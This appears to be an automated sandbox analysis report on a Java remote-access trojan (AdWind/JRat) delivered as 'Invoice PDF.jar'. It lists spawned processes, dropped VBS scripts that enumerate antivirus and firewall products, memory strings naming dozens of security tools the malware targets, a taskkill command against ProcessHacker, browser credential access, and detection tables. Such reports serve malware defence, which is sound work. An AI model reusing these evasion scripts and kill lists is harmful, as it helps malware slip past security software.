          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
          Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmpBinary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","sc
          Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmpBinary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
          Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmpBinary or memory string: Program Manager
          Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmpBinary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","Forx
          Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
          Source: javaw.exe, 00000009.00000002.588380714.0000000001110000.00000002.00000001.sdmp, java.exe, 0000000A.00000002.588591333.00000000010A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: javaw.exe, 00000009.00000002.593505828.000000000A358000.00000004.00000001.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}e","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\jhxromh.txt","VBOX":true,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShieldCCC.exe","MCShieldRTM.exe","MCShieldDS.exe","MCS-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","For
          Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmpBinary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
          Source: javaw.exe, 00000009.00000002.590078490.0000000004BEE000.00000004.00000001.sdmpBinary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
          Source: javaw.exe, 00000009.00000002.589280464.0000000004A22000.00000004.00000001.sdmpBinary or memory string: Program Manager?<
          Source: javaw.exe, 00000009.00000002.593576639.000000000A3CA000.00000004.00000001.sdmpBinary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}0
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeCode function: 2_2_02CB0380 cpuid
          Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: EMLPROXY.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: AVKService.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: fsgk32.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: AVKProxy.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: AVKTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SBAMTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7RTScan.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: FSMA32.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: ONLINENT.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SCANWSCS.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SUPERAntiSpyware.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: MsMpEng.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7FWSrvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: guardxservice.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7TSecurity.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7PSSrvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: MSASCui.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: cmdagent.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: acs.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7TSMngr.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: BullGuard.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: virusutilities.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: K7EmlPxy.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: ClamTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: SBAMSvc.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: procexp.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: FPAVServer.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: mbam.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: QUHLPSVC.EXE
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: FProtTray.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: ClamWin.exe
          Source: javaw.exe, 00000009.00000002.593335870.000000000A2CC000.00000004.00000001.sdmpBinary or memory string: op_mon.exe
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
          Source: C:\Windows\SysWOW64\cscript.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

          Stealing of Sensitive Information:

          barindex
          Yara detected AdWind RATShow sources
          Source: Yara matchFile source: Process Memory Space: java.exe PID: 4596, type: MEMORY
          Yara detected AdWind RATs dllShow sources
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, type: DROPPED
          Source: Yara matchFile source: 10.2.java.exe.4881274.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.javaw.exe.740d0000.8.unpack, type: UNPACKEDPE
          Tries to harvest and steal browser information (history, passwords, etc)Show sources
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

          Remote Access Functionality:

          barindex
          Detected ADWIND RatShow sources
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\javaw.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from AntiVirusProduct")For Each objItem in colItems With objItem WScript.Echo "{""AV"":""" & .displayName & """}" End WithNextJump to dropped file
          Source: C:\Program Files (x86)\Java\jre1.8.0_211\bin\java.exeDropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNextJump to dropped file
          Yara detected AdWind RATShow sources
          Source: Yara matchFile source: Process Memory Space: java.exe PID: 4596, type: MEMORY
          Yara detected AdWind RATs dllShow sources
          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll, type: DROPPED
          Source: Yara matchFile source: 10.2.java.exe.4881274.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 9.2.javaw.exe.740d0000.8.unpack, type: UNPACKEDPE
          Java source code contains strings found in CrossRATShow sources
          Source: jhxromh.txt.5.drSuspicious string: operational.JRat (in operational/Jrat.java)
          Source: _0.5473048333189129536838706564981496.class.9.drSuspicious string: operational.JRat (in operational/Jrat.java)

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsWindows Management Instrumentation11Services File Permissions Weakness1Process Injection12Masquerading21OS Credential Dumping1Query Registry1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsServices File Permissions Weakness1Modify Registry1LSASS MemorySecurity Software Discovery231Remote Desktop ProtocolData from Local System1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsScripting11Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsExploitation for Client Execution1Logon Script (Mac)Logon Script (Mac)Disable or Modify Tools11NTDSProcess Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptProcess Injection12LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonScripting11Cached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobServices File Permissions Weakness1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 392877 Sample: Invoice PDF.jar Startdate: 19/04/2021 Architecture: WINDOWS Score: 100 100 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->100 102 Found malware configuration 2->102 104 Malicious sample detected (through community Yara rule) 2->104 106 9 other signatures 2->106 11 cmd.exe 2 2->11         started        process3 process4 13 java.exe 6 11->13         started        15 conhost.exe 11->15         started        process5 17 wscript.exe 3 3 13->17         started        21 icacls.exe 1 13->21         started        23 conhost.exe 15->23         started        file6 72 C:\Users\user\...\ebgeaegdbdecaedfebace.reg, ASCII 17->72 dropped 108 Uses regedit.exe to modify the Windows registry 17->108 25 javaw.exe 34 17->25         started        30 regedit.exe 17->30         started        32 conhost.exe 21->32         started        signatures7 process8 dnsIp9 96 107.175.101.209, 49739, 49774, 49786 NEXEONUS United States 25->96 98 192.168.2.1 unknown unknown 25->98 86 C:\Users\...\Windows9046764930049020633.dll, PE32 25->86 dropped 88 C:\Users\...\Windows278170804881636675.dll, PE32 25->88 dropped 90 C:\Users\...\Retrive7530640457785674935.vbs, ASCII 25->90 dropped 92 2 other files (1 malicious) 25->92 dropped 110 Tries to harvest and steal browser information (history, passwords, etc) 25->110 34 xcopy.exe 25->34         started        37 java.exe 17 25->37         started        40 cmd.exe 25->40         started        42 4 other processes 25->42 file10 signatures11 process12 dnsIp13 74 C:\Users\user\AppData\Roaming\...\zip.dll, PE32 34->74 dropped 76 C:\Users\user\AppData\...\wsdetect.dll, PE32 34->76 dropped 78 C:\Users\user\AppData\...\w2k_lsa_auth.dll, PE32 34->78 dropped 84 128 other files (none is malicious) 34->84 dropped 94 127.0.0.1 unknown unknown 37->94 80 C:\Users\...\Retrive9101275134933643330.vbs, ASCII 37->80 dropped 82 C:\Users\...\Retrive7965693575833183651.vbs, ASCII 37->82 dropped 44 cmd.exe 37->44         started        46 cmd.exe 37->46         started        48 cmd.exe 37->48         started        50 conhost.exe 37->50         started        52 conhost.exe 40->52         started        54 cscript.exe 40->54         started        56 conhost.exe 42->56         started        58 cscript.exe 42->58         started        60 conhost.exe 42->60         started        file14 process15 process16 62 conhost.exe 44->62         started        64 cscript.exe 44->64         started        66 conhost.exe 46->66         started        68 cscript.exe 46->68         started        70 conhost.exe 48->70         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Invoice PDF.jar12%VirustotalBrowse

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\Retrive7965693575833183651.vbs100%AviraVBS/Agent.276
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll100%AviraTR/Spy.Agent.lusda
          C:\Users\user\AppData\Local\Temp\Retrive4117647702204724132.vbs100%AviraVBS/Agent.276
          C:\Users\user\AppData\Local\Temp\Retrive7530640457785674935.vbs100%AviraVBS/Agent.281
          C:\Users\user\AppData\Local\Temp\Retrive9101275134933643330.vbs100%AviraVBS/Agent.281
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll100%AviraTR/Spy.Agent.3850
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll75%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Windows278170804881636675.dll74%ReversingLabsWin32.Trojan.AdWind
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll49%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\Windows9046764930049020633.dll66%ReversingLabsWin32.Trojan.AdWind
          C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\sqlite-3.8.11.2-42eaffe0-b8ea-4880-ab72-6ea9a41a3e14-sqlitejdbc.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\JAWTAccessBridge-32.dll3%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\Oracle\bin\JavaAccessBridge-32.dll3%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\Oracle\bin\WindowsAccessBridge-32.dll3%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-console-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-datetime-l1-1-0.dll0%ReversingLabs
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Roaming\Oracle\bin\api-ms-win-core-debug-l1-1-0.dll0%ReversingLabs

          Unpacked PE Files

          No Antivirus matches

          Domains

          No Antivirus matches

          URLs

          SourceDetectionScannerLabelLink
          http://javax.xml.XMLConstants/property/accessExternalDTDS0%Avira URL Cloudsafe
          http://www.chambersign.org10%URL Reputationsafe
          http://www.chambersign.org10%URL Reputationsafe
          http://www.chambersign.org10%URL Reputationsafe
          http://www.chambersign.org10%URL Reputationsafe
          http://java.sun.com/xml/dom/properties/0%VirustotalBrowse
          http://java.sun.com/xml/dom/properties/0%Avira URL Cloudsafe
          https://jrat.ioS0%Avira URL Cloudsafe
          http://java.sun.com/xml/dom/properties/;0%Avira URL Cloudsafe
          http://java.sun.com/xml/schema/features/report-ignored-element-content-whitespace00%Avira URL Cloudsafe
          http://policy.camerfirma.com00%URL Reputationsafe
          http://policy.camerfirma.com00%URL Reputationsafe
          http://policy.camerfirma.com00%URL Reputationsafe
          http://java.sun.com/xml/stream/properties/ignore-external-dtd0%Avira URL Cloudsafe
          http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
          http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
          http://www.certplus.com/CRL/class2.crl0%URL Reputationsafe
          http://bugreport.sun.com/bugreport/0%Avira URL Cloudsafe
          http://java.sun.com/xml/dom/properties/c0%Avira URL Cloudsafe
          http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
          http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
          http://cps.chambersign.org/cps/chambersroot.html0%URL Reputationsafe
          http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
          http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
          http://www.certplus.com/CRL/class3P.crl0%URL Reputationsafe
          http://java.sun.com/xml/stream/properties/reader-in-defined-stateodeIter0%Avira URL Cloudsafe
          http://javax.xml.XMLConstants/property/accessExternalDTD30%Avira URL Cloudsafe
          http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
          http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
          http://crl.securetrust.com/STCA.crl0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/accessExternalDTD;0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/accessExternalDTD;0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/accessExternalDTD;0%URL Reputationsafe
          http://java.sun.com/dtd/properties.dtdk0%Avira URL Cloudsafe
          http://java.sun.com/xml/dom/properties/ancestor-check0%Avira URL Cloudsafe
          http://ops.com.pa/jre7.zipW0%Avira URL Cloudsafe
          http://gG2DwoT3pJewMEBGx6.com0%Avira URL Cloudsafe
          http://javax.xml.XMLConstants/property/0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/0%URL Reputationsafe
          http://java.sun.com/xml/dom/properties/ancestor-checkurr0%Avira URL Cloudsafe
          http://java.sun.com/xml/dom/properties/ancestor-check3C0%Avira URL Cloudsafe
          http://ops.com.pa/jre7.zip0%Avira URL Cloudsafe
          http://java.sun.com/xml/stream/properties/3p0%Avira URL Cloudsafe
          https://jrat.io0%Avira URL Cloudsafe
          http://javax.xml.XMLConstants/property/accessExternalSchemaD0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/accessExternalSchemaD0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/accessExternalSchemaD0%URL Reputationsafe
          http://javax.xml.XMLConstants/property/s30%Avira URL Cloudsafe
          http://java.sun.com/xml/stream/properties/reader-in-defined-state0%Avira URL Cloudsafe

          Domains and IPs

          Contacted Domains

          No contacted domains info

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://apache.org/xml/properties/internal/validator/schema#8java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
            		high
            http://javax.xml.XMLConstants/property/accessExternalDTDSjava.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
            • Avira URL Cloud: safe
            		unknown
            http://apache.org/xml/properties/internal/entity-resolvertjavaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmpfalse
              		high
              http://apache.org/xml/features/validation/schema/augment-psvijavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                		high
                http://apache.org/xml/features/validation/schemaK~java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                  		high
                  http://apache.org/xml/properties/internal/entity-resolversjava.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                    		high
                    http://maven.apache.org/POM/4.0.0javaw.exe, 00000009.00000003.536827543.0000000015847000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.592336171.0000000004ECE000.00000004.00000001.sdmpfalse
                      		high
                      http://apache.org/xml/properties/input-buffer-sizejavaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmp, javaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.593238086.0000000009F57000.00000004.00000001.sdmpfalse
                        		high
                        http://apache.org/xml/features/validation/balance-syntax-trees#java.exe, 0000000A.00000002.591826457.0000000004A82000.00000004.00000001.sdmpfalse
                          		high
                          http://www.chambersign.org1javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://apache.org/xml/features/standard-uri-conformant2javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                            		high
                            http://apache.org/xml/properties/internal/document-scanner/apach7java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                              		high
                              http://repository.swisssign.com/0javaw.exe, 00000009.00000002.593050398.000000000A203000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592404131.0000000009C36000.00000004.00000001.sdmpfalse
                                		high
                                http://apache.org/xml/properties/schema/external-schemaLocation(javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                  		high
                                  http://apache.org/xml/properties/internal/entity-managerjavaw.exe, 00000009.00000002.593384054.000000000A2E9000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.592869177.0000000009DDB000.00000004.00000001.sdmpfalse
                                    		high
                                    http://www.oracle.com/feature/use-service-mechanism/w3c/javaw.exe, 00000009.00000003.384085782.00000000156DC000.00000004.00000001.sdmpfalse
                                      		high
                                      http://apache.org/xml/properties/internal/symbol-tableQjavaw.exe, 00000009.00000003.537077103.0000000014FD2000.00000004.00000001.sdmp, java.exe, 0000000A.00000002.595923199.0000000015228000.00000004.00000001.sdmpfalse
                                        		high
